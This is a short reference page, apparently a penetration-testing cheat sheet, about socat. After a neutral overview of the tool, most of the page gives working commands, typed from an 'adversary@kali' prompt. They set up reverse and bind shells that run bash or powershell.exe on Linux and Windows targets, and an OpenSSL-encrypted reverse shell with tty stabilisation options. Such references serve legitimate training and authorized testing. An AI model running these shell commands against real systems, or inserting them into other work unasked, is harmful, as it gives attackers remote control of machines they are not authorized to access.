Socat

  • Socat (for SOcket CAT) establishes two bidirectional byte streams and transfers data between them. Data channels may be files, pipes, devices (terminal or modem, etc.), or sockets (Unix, IPv4, IPv6, raw, UDP, TCP, SSL). It provides forking, logging and tracing, different modes for interprocess communication and many more options.

It can be used, for example, as a TCP relay (one-shot or daemon), as an external socksifier, as a shell interface to Unix sockets, as an IPv6 relay, as a netcat and rinetd replacement, to redirect TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts inside network connections. Socat supports sctp as of 1.7.0.

Versions for all major platforms are available.

Socat reverse shells

A basic reverse shell listener in socat:

adversary@kali:~# socat TCP-L:<port-number> -

To connect back to the listener on a Linux target system:

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

To connect back to the listener on a Windows target system:

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

Socat bind shells

Set up a listener on a Linux target:

socat TCP-L:<PORT> EXEC:"bash -li"

Set up a listener on a Windows target:

socat TCP-L:<PORT> EXEC:powershell.exe,pipes

The pipes argument interfaces between the Unix and Windows ways of handling input and output in a CLI environment.

Regardless of the target machine, connect to the waiting listener with:

socat TCP:<TARGET-IP>:<TARGET-PORT> -

For a fully stable Linux tty reverse shell, use the tty technique.

Socat encrypted shells

Setting up an OPENSSL-LISTENER using the tty technique and a PEM file called encrypt.pem:

adversary@kali:~# openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
adversary@kali:~# cat shell.key shell.crt > encrypt.pem
adversary@kali:~# socat OPENSSL-LISTEN:<port-number>,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

Connecting back to this listener from the target machine:

socat OPENSSL:<IP address attack machine>:<port-number>,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
  • pty allocates a pseudoterminal on the target – part of the stabilisation process

  • stderr makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)

  • sigint passes any Ctrl+C commands through into the sub-process, allowing for kill commands inside the shell

  • setsid creates the process in a new session

  • sane stabilises the terminal, attempting to “normalise” it.